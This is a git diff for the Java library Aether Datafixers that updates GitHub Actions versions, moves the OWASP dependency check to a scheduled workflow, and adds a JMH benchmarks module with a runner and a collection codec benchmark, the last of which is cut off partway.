diff --git a/.github/workflows/ci-pr.yml b/.github/workflows/ci-pr.yml index 91961ff..340e73b 100644 --- a/.github/workflows/ci-pr.yml +++ b/.github/workflows/ci-pr.yml @@ -20,12 +20,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -36,7 +36,7 @@ jobs: # Upload XMLs ONLY once (Java 21) so the report doesn't double-count - name: Upload unit test XMLs (Java 21 only) - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() && matrix.java == '21' with: name: unit-xml @@ -56,12 +56,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -72,7 +72,7 @@ jobs: # Upload XMLs ONLY once (Java 21) so the report doesn't double-count - name: Upload IT test XMLs (Java 21 only) - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() && matrix.java == '21' with: name: it-xml @@ -87,12 +87,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK 21 - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: '21' distribution: 'temurin' @@ -107,35 +107,6 @@ jobs: - name: Run Checkstyle analysis run: mvn -B checkstyle:check -Pqa -Ddependency-check.skip=true - dependency-check: - name: OWASP Dependency Check - runs-on: ubuntu-latest - needs: build - env: - NVD_API_KEY: ${{ secrets.NVD_API_KEY }} - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Set up JDK 21 - uses: actions/setup-java@v4 - with: - java-version: '21' - distribution: 'temurin' - cache: 'maven' - - - name: Cache Dependency-Check DB - uses: actions/cache@v4 - with: - path: ~/.m2/repository/org/owasp/dependency-check-data - key: depcheck-${{ runner.os }}-${{ hashFiles('**/pom.xml') }} - restore-keys: | - depcheck-${{ runner.os }}- - - - name: Run OWASP Dependency Check - run: mvn -B dependency-check:aggregate -Pqa - reports: name: Test Reports runs-on: ubuntu-latest @@ -149,26 +120,26 @@ jobs: steps: - name: Download unit XMLs (Java 21 only) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: unit-xml path: reports/unit - name: Download IT XMLs (Java 21 only) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: it-xml path: reports/it - name: Publish Unit Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/unit/**/TEST-*.xml' check_name: Unit Test Report - name: Publish IT Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/it/**/TEST-*.xml' diff --git a/.github/workflows/ci-push.yml b/.github/workflows/ci-push.yml index ddd4e2a..a55ab3e 100644 --- a/.github/workflows/ci-push.yml +++ b/.github/workflows/ci-push.yml @@ -19,12 +19,12 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -34,7 +34,7 @@ jobs: run: mvn -B clean verify -Pqa -Ddependency-check.skip=true - name: Upload unit test XMLs - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 if: always() with: name: unit-xml-java-${{ matrix.java }} @@ -55,14 +55,14 @@ jobs: steps: - name: Download unit XMLs (all Java versions) - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: pattern: unit-xml-java-* merge-multiple: true path: reports/unit - name: Publish Unit Test Report - uses: mikepenz/action-junit-report@v4 + uses: mikepenz/action-junit-report@v6 if: always() with: report_paths: 'reports/unit/**/TEST-*.xml' diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml index 5233757..da7d0dd 100644 --- a/.github/workflows/codeql.yml +++ b/.github/workflows/codeql.yml @@ -20,19 +20,19 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 - name: Set up JDK 21 - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: '21' distribution: 'temurin' cache: 'maven' - name: Initialize CodeQL - uses: github/codeql-action/init@v3 + uses: github/codeql-action/init@v4 with: languages: java-kotlin build-mode: manual @@ -42,6 +42,6 @@ jobs: run: mvn -B clean compile -DskipTests - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@v3 + uses: github/codeql-action/analyze@v4 with: category: "/language:java-kotlin" diff --git a/.github/workflows/dependabot-retarget-to-develop.yml b/.github/workflows/dependabot-retarget-to-develop.yml index ef0d89d..d6df9d6 100644 --- a/.github/workflows/dependabot-retarget-to-develop.yml +++ b/.github/workflows/dependabot-retarget-to-develop.yml @@ -16,7 +16,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Change base branch to develop - uses: actions/github-script@v7 + uses: actions/github-script@v8 with: script: | const pr = context.payload.pull_request; diff --git a/.github/workflows/dependency-review.yml b/.github/workflows/dependency-review.yml index 1dbab60..67b6c0f 100644 --- a/.github/workflows/dependency-review.yml +++ b/.github/workflows/dependency-review.yml @@ -15,7 +15,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 1 diff --git a/.github/workflows/owasp-dependency-check.yml b/.github/workflows/owasp-dependency-check.yml new file mode 100644 index 0000000..a821a57 --- /dev/null +++ b/.github/workflows/owasp-dependency-check.yml @@ -0,0 +1,48 @@ +name: OWASP Dependency Check + +on: + schedule: + # Runs every Sunday at 3:00 AM UTC + - cron: '0 3 * * 0' + workflow_dispatch: + +permissions: + contents: read + security-events: write + +jobs: + dependency-check: + name: OWASP Dependency Check + runs-on: ubuntu-latest + env: + NVD_API_KEY: ${{ secrets.NVD_API_KEY }} + + steps: + - name: Checkout repository + uses: actions/checkout@v6 + + - name: Set up JDK 21 + uses: actions/setup-java@v5 + with: + java-version: '21' + distribution: 'temurin' + cache: 'maven' + + - name: Cache Dependency-Check DB + uses: actions/cache@v5 + with: + path: ~/.m2/repository/org/owasp/dependency-check-data + key: depcheck-${{ runner.os }}-${{ hashFiles('**/pom.xml') }} + restore-keys: | + depcheck-${{ runner.os }}- + + - name: Run OWASP Dependency Check + run: mvn -B dependency-check:aggregate -Pqa + + - name: Upload Dependency Check Report + uses: actions/upload-artifact@v6 + if: always() + with: + name: dependency-check-report + path: target/dependency-check-report.html + retention-days: 30 diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 8867b33..2140a2a 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -33,7 +33,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 with: fetch-depth: 0 @@ -65,7 +65,7 @@ jobs: fi - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ env.JAVA_VERSION }} distribution: 'temurin' @@ -85,10 +85,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ matrix.java }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ matrix.java }} distribution: 'temurin' @@ -105,10 +105,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 env: CENTRAL_USERNAME: ${{ secrets.CENTRAL_USERNAME }} CENTRAL_TOKEN: ${{ secrets.CENTRAL_TOKEN }} @@ -137,10 +137,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Set up JDK ${{ env.JAVA_VERSION }} - uses: actions/setup-java@v4 + uses: actions/setup-java@v5 with: java-version: ${{ env.JAVA_VERSION }} distribution: 'temurin' @@ -150,7 +150,7 @@ jobs: run: mvn -B cyclonedx:makeAggregateBom -Pqa - name: Upload SBOM artifact - uses: actions/upload-artifact@v4 + uses: actions/upload-artifact@v6 with: name: sbom path: target/bom.* @@ -168,10 +168,10 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@v6 - name: Download SBOM - uses: actions/download-artifact@v4 + uses: actions/download-artifact@v7 with: name: sbom path: sbom/ diff --git a/.gitignore b/.gitignore index 5232b33..dcc6e4a 100644 --- a/.gitignore +++ b/.gitignore @@ -50,3 +50,6 @@ bin/ # Claude Code /.claude/ /CLAUDE.md + +# GitHub +current-ticket.md \ No newline at end of file diff --git a/aether-datafixers-api/pom.xml b/aether-datafixers-api/pom.xml index 1322745..eb56948 100644 --- a/aether-datafixers-api/pom.xml +++ b/aether-datafixers-api/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-api diff --git a/aether-datafixers-benchmarks/pom.xml b/aether-datafixers-benchmarks/pom.xml new file mode 100644 index 0000000..ef8e7ba --- /dev/null +++ b/aether-datafixers-benchmarks/pom.xml @@ -0,0 +1,174 @@ + + + 4.0.0 + + + de.splatgames.aether.datafixers + aether-datafixers + 1.0.0-SNAPSHOT + + + aether-datafixers-benchmarks + jar + + Aether Datafixers :: Benchmarks + JMH microbenchmarks for Aether Datafixers performance analysis. + + + + true + true + + true + + de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner + + + + + + de.splatgames.aether.datafixers + aether-datafixers-api + + + de.splatgames.aether.datafixers + aether-datafixers-core + + + de.splatgames.aether.datafixers + aether-datafixers-codec + + + de.splatgames.aether.datafixers + aether-datafixers-testkit + + + + + org.openjdk.jmh + jmh-core + + + org.openjdk.jmh + jmh-generator-annprocess + provided + + + + + com.google.code.gson + gson + + + com.fasterxml.jackson.core + jackson-databind + + + + + org.yaml + snakeyaml + + + com.fasterxml.jackson.dataformat + jackson-dataformat-yaml + + + + + com.fasterxml.jackson.dataformat + jackson-dataformat-toml + + + + + com.fasterxml.jackson.dataformat + jackson-dataformat-xml + + + + + com.google.guava + guava + + + + + org.jetbrains + annotations + + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + + + org.openjdk.jmh + jmh-generator-annprocess + ${jmh.version} + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + + + org.apache.maven.plugins + maven-shade-plugin + ${plugin.shade.version} + + + package + + shade + + + + + org.openjdk.jmh.Main + + + + + + + *:* + + META-INF/*.SF + META-INF/*.DSA + META-INF/*.RSA + META-INF/MANIFEST.MF + + + + false + true + benchmarks + + + + + + + + org.codehaus.mojo + exec-maven-plugin + 3.1.0 + + ${main.class} + + + + + diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java new file mode 100644 index 0000000..beb5766 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java @@ -0,0 +1,341 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks; + +import org.openjdk.jmh.runner.Runner; +import org.openjdk.jmh.runner.RunnerException; +import org.openjdk.jmh.runner.options.Options; +import org.openjdk.jmh.runner.options.OptionsBuilder; + +import java.io.IOException; + +/** + * Main entry point for running Aether Datafixers JMH benchmarks. + * + *

This class provides both a command-line interface and programmatic API for + * executing benchmarks. It supports all standard JMH options while providing + * convenient preset configurations for common benchmark scenarios.

+ * + *

Execution Methods

+ * + *

Via Maven exec:java (Development)

+ *

Quick way to run benchmarks during development without building a JAR:

+ *
{@code
+ * # Run all benchmarks with default settings
+ * mvn exec:java -pl aether-datafixers-benchmarks
+ *
+ * # Run with JMH arguments
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ *
+ * # Run specific benchmark pattern
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
+ * }
+ * + *

Via Fat JAR (Production)

+ *

Recommended for production benchmark runs with full JMH isolation:

+ *
{@code
+ * # Build the fat JAR
+ * mvn clean package -pl aether-datafixers-benchmarks -DskipTests
+ *
+ * # Run all benchmarks
+ * java -jar aether-datafixers-benchmarks/target/aether-datafixers-benchmarks-*-benchmarks.jar
+ *
+ * # Run specific benchmark
+ * java -jar target/*-benchmarks.jar SingleFixBenchmark
+ *
+ * # Run with custom parameters
+ * java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
+ *
+ * # Output JSON results for analysis
+ * java -jar target/*-benchmarks.jar -rf json -rff results.json
+ *
+ * # List all available benchmarks
+ * java -jar target/*-benchmarks.jar -l
+ *
+ * # Profile with async-profiler
+ * java -jar target/*-benchmarks.jar -prof async:output=flamegraph
+ * }
+ * + *

Available Benchmark Categories

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
CategoryBenchmarksFocus
CoreSingleFixBenchmark, MultiFixChainBenchmark, SchemaLookupBenchmarkDataFixer migration performance
FormatJsonBenchmark, YamlBenchmark, TomlXmlBenchmark, CrossFormatBenchmarkDynamicOps format comparisons
CodecPrimitiveCodecBenchmark, CollectionCodecBenchmarkSerialization/deserialization
ConcurrentConcurrentMigrationBenchmarkThread-safety and scalability
+ * + *

Programmatic API

+ *

For integration with test frameworks or custom tooling:

+ *
{@code
+ * // Run all benchmarks
+ * BenchmarkRunner.runAllBenchmarks();
+ *
+ * // Run quick validation (CI/CD)
+ * BenchmarkRunner.runQuickBenchmarks();
+ *
+ * // Run only core benchmarks
+ * BenchmarkRunner.runCoreBenchmarks();
+ *
+ * // Run only format benchmarks
+ * BenchmarkRunner.runFormatBenchmarks();
+ * }
+ * + *

Default Configuration

+ * + * + * + * + * + * + *
SettingDefaultQuick Mode
Warmup iterations52
Measurement iterations103
Forks21
JVM heap2 GB1 GB
+ * + *

Common JMH Options

+ * + * + * + * + * + * + * + * + * + * + * + *
OptionDescriptionExample
{@code -wi}Warmup iterations{@code -wi 3}
{@code -i}Measurement iterations{@code -i 5}
{@code -f}Number of forks{@code -f 1}
{@code -p}Parameter value{@code -p payloadSize=SMALL}
{@code -t}Thread count{@code -t 4}
{@code -rf}Result format{@code -rf json}
{@code -rff}Result file{@code -rff results.json}
{@code -l}List benchmarks{@code -l}
{@code -prof}Profiler{@code -prof gc}
+ * + * @author Erik Pförtner + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.codec + * @see de.splatgames.aether.datafixers.benchmarks.concurrent + * @since 1.0.0 + */ +public final class BenchmarkRunner { + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkRunner() { + // Main class + } + + /** + * Main entry point for running benchmarks from the command line. + * + *

Behavior depends on whether arguments are provided:

+ * + * + *

Exit Codes

+ * + * + * @param args command-line arguments (passed directly to JMH if present) + * @throws RunnerException if benchmark execution fails + * @throws IOException if there is an I/O error reading benchmark metadata + */ + public static void main(final String[] args) throws RunnerException, IOException { + if (args.length > 0) { + // If arguments are provided, delegate to JMH main + org.openjdk.jmh.Main.main(args); + } else { + // Run with default options + runAllBenchmarks(); + } + } + + /** + * Runs all benchmarks in the benchmarks package with default configuration. + * + *

Executes every benchmark class in + * {@code de.splatgames.aether.datafixers.benchmarks.*} with production-quality + * settings suitable for reliable performance measurements.

+ * + *

Configuration

+ * + * + *

Note: Running all benchmarks can take significant time depending + * on the number of parameter combinations. Consider using + * {@link #runQuickBenchmarks()} for validation or {@link #runCoreBenchmarks()} + * for focused testing.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runQuickBenchmarks() + * @see #runCoreBenchmarks() + */ + public static void runAllBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } + + /** + * Runs a quick subset of benchmarks for fast validation. + * + *

Executes only the {@code SingleFixBenchmark} with minimal iterations, + * suitable for:

+ * + * + *

Configuration

+ * + * + *

Warning: Results from quick benchmarks should not be used for + * performance comparisons due to reduced statistical rigor.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runAllBenchmarks() + */ + public static void runQuickBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\.SingleFixBenchmark") + .warmupIterations(2) + .measurementIterations(3) + .forks(1) + .jvmArgs("-Xms1G", "-Xmx1G") + .param("payloadSize", "SMALL") + .build(); + + new Runner(options).run(); + } + + /** + * Runs only the core migration benchmarks. + * + *

Executes benchmarks in the {@code core} package that measure DataFixer + * migration performance:

+ * + * + *

Configuration

+ * + * + *

Use this method when focusing on migration performance without + * format-specific or codec overhead considerations.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runFormatBenchmarks() + * @see #runAllBenchmarks() + */ + public static void runCoreBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } + + /** + * Runs only the format comparison benchmarks. + * + *

Executes benchmarks in the {@code format} package that compare different + * DynamicOps implementations:

+ * + * + *

Configuration

+ * + * + *

Use this method when evaluating which DynamicOps implementation + * to use for a specific use case, or when optimizing format handling.

+ * + * @throws RunnerException if benchmark execution fails + * @see #runCoreBenchmarks() + * @see #runAllBenchmarks() + */ + public static void runFormatBenchmarks() throws RunnerException { + final Options options = new OptionsBuilder() + .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.format\\..*") + .warmupIterations(5) + .measurementIterations(10) + .forks(2) + .jvmArgs("-Xms2G", "-Xmx2G") + .build(); + + new Runner(options).run(); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java new file mode 100644 index 0000000..56405aa --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java @@ -0,0 +1,406 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.codec; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.codec.Codec; +import de.splatgames.aether.datafixers.api.codec.Codecs; +import de.splatgames.aether.datafixers.api.result.DataResult; +import de.splatgames.aether.datafixers.api.util.Pair; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.ArrayList; +import java.util.List; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for collection codec encode/decode performance. + * + *

Measures the performance of list codec operations with parameterized collection + * sizes. These benchmarks reveal how codec performance scales with data volume and + * help identify potential bottlenecks in collection traversal and element processing.

+ * + *

Benchmark Categories

+ * + *

String List Benchmarks

+ *

Measure {@code List} codec operations:

+ * + * + *

Integer List Benchmarks

+ *

Measure {@code List} codec operations:

+ * + * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
listSize10, 100, 1000Number of elements in the test list
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2 (for JIT variance mitigation)
JVM Heap2 GB min/max
Time UnitMicroseconds (appropriate for collection operations)
+ * + *

Test Data Generation

+ * + * + * + * + *
CollectionElement PatternExample (size=3)
String List{@code "item-" + index}["item-0", "item-1", "item-2"]
Integer List{@code index}[0, 1, 2]
+ * + *

Interpreting Results

+ * + * + *

Usage

+ *
{@code
+ * # Run all collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run with specific list size
+ * java -jar benchmarks.jar CollectionCodecBenchmark -p listSize=1000
+ *
+ * # Run only string list benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.*String.*"
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.encode.*"
+ *
+ * # Compare direct vs functional round-trip
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.roundTrip.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar CollectionCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar CollectionCodecBenchmark -rf json -rff collection_results.json
+ * }
+ * + * @author Erik Pförtner + * @see PrimitiveCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codecs#list(Codec) + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class CollectionCodecBenchmark { + + /** + * The number of elements in test lists, injected by JMH. + * + *

This parameter controls the size of both string and integer lists. + * Different sizes reveal scaling characteristics of the list codec:

+ * + */ + @Param({"10", "100", "1000"}) + private int listSize; + + /** + * The DynamicOps implementation used for all codec operations. + * + *

GsonOps is used as the reference JSON implementation for benchmarks.

+ */ + private GsonOps ops; + + /** + * Codec for encoding/decoding {@code List}. + * + *

Created via {@link Codecs#list(Codec)} wrapping {@link Codecs#STRING}.

+ */ + private Codec> stringListCodec; + + /** + * Codec for encoding/decoding {@code List}. + * + *

Created via {@link Codecs#list(Codec)} wrapping {@link Codecs#INT}.

+ */ + private Codec> intListCodec; + + /** + * Test string list populated with {@link #listSize} elements. + * + *

Elements follow the pattern "item-0", "item-1", ..., "item-(n-1)".

+ */ + private List stringList; + + /** + * Test integer list populated with {@link #listSize} elements. + * + *

Elements are sequential integers: 0, 1, 2, ..., (n-1).

+ */ + private List intList; + + /** + * Pre-encoded JSON array for string list decode benchmarks. + * + *

Created during setup to isolate decode performance from encoding overhead.

+ */ + private JsonElement encodedStringList; + + /** + * Pre-encoded JSON array for integer list decode benchmarks. + * + *

Created during setup to isolate decode performance from encoding overhead.

+ */ + private JsonElement encodedIntList; + + /** + * Initializes codecs, test data, and pre-encoded JSON elements. + * + *

This setup method:

+ *
    + *
  1. Creates list codecs by composing primitive codecs with {@link Codecs#list(Codec)}
  2. + *
  3. Populates test lists with {@link #listSize} elements each
  4. + *
  5. Pre-encodes both lists to JSON for decode benchmark isolation
  6. + *
+ * + *

Using {@link ArrayList} with pre-sized capacity avoids resizing overhead + * during population.

+ */ + @Setup(Level.Trial) + public void setup() { + this.ops = GsonOps.INSTANCE; + + this.stringListCodec = Codecs.list(Codecs.STRING); + this.intListCodec = Codecs.list(Codecs.INT); + + this.stringList = new ArrayList<>(this.listSize); + this.intList = new ArrayList<>(this.listSize); + + for (int i = 0; i < this.listSize; i++) { + this.stringList.add("item-" + i); + this.intList.add(i); + } + + this.encodedStringList = this.stringListCodec.encodeStart(this.ops, this.stringList) + .result().orElseThrow(); + this.encodedIntList = this.intListCodec.encodeStart(this.ops, this.intList) + .result().orElseThrow(); + } + + // ==================== String List Benchmarks ==================== + + /** + * Benchmarks string list encoding to JSON array. + * + *

Measures the performance of converting a {@code List} to a JSON + * array element. Each string element is individually encoded and added to the + * resulting array.

+ * + *

Performance factors:

+ *
    + *
  • List iteration overhead
  • + *
  • Per-element string encoding cost
  • + *
  • JSON array construction and element addition
  • + *
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeStringList(final Blackhole blackhole) { + final DataResult result = this.stringListCodec.encodeStart(this.ops, this.stringList); + blackhole.consume(result); + } + + /** + * Benchmarks string list decoding from JSON array. + * + *

Measures the performance of extracting a {@code List} from a + * pre-encoded JSON array. Each array element is decoded to a string and + * collected into the result list.

+ * + *

Performance factors:

+ *
    + *
  • JSON array traversal
  • + *
  • Per-element string extraction
  • + *
  • Result list construction and population
  • + *
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeStringList(final Blackhole blackhole) { + final DataResult, JsonElement>> result = this.stringListCodec.decode(this.ops, this.encodedStringList); + blackhole.consume(result); + } + + // ==================== Integer List Benchmarks ==================== + + /** + * Benchmarks integer list encoding to JSON array. + * + *

Measures the performance of converting a {@code List} to a JSON + * array element. Integer encoding is typically faster than string encoding + * due to simpler value representation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeIntList(final Blackhole blackhole) { + final DataResult result = this.intListCodec.encodeStart(this.ops, this.intList); + blackhole.consume(result); + } + + /** + * Benchmarks integer list decoding from JSON array. + * + *

Measures the performance of extracting a {@code List} from a + * pre-encoded JSON array. Integer decoding involves numeric parsing from + * JSON number elements.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeIntList(final Blackhole blackhole) { + final DataResult, JsonElement>> result = this.intListCodec.decode(this.ops, this.encodedIntList); + blackhole.consume(result); + } + + // ==================== Round-Trip Benchmarks (Direct Style) ==================== + + /** + * Benchmarks complete string list round-trip with direct result extraction. + * + *

Measures the combined performance of encoding a {@code List} to JSON + * and immediately decoding it back. Uses {@code result().orElseThrow()} for + * direct value extraction, representing typical imperative usage patterns.

+ * + *

This benchmark is useful for scenarios where data is temporarily serialized + * (e.g., caching, message passing) and immediately deserialized.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringListDirect(final Blackhole blackhole) { + final JsonElement json = this.stringListCodec.encodeStart(this.ops, this.stringList) + .result().orElseThrow(); + final Pair, JsonElement> decoded = this.stringListCodec.decode(this.ops, json) + .result().orElseThrow(); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete integer list round-trip with direct result extraction. + * + *

Measures the combined performance of encoding a {@code List} to JSON + * and immediately decoding it back using direct value extraction.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntListDirect(final Blackhole blackhole) { + final JsonElement json = this.intListCodec.encodeStart(this.ops, this.intList) + .result().orElseThrow(); + final Pair, JsonElement> decoded = this.intListCodec.decode(this.ops, json) + .result().orElseThrow(); + blackhole.consume(decoded); + } + + // ==================== Round-Trip Benchmarks (Functional Style) ==================== + + /** + * Benchmarks complete string list round-trip using functional API. + * + *

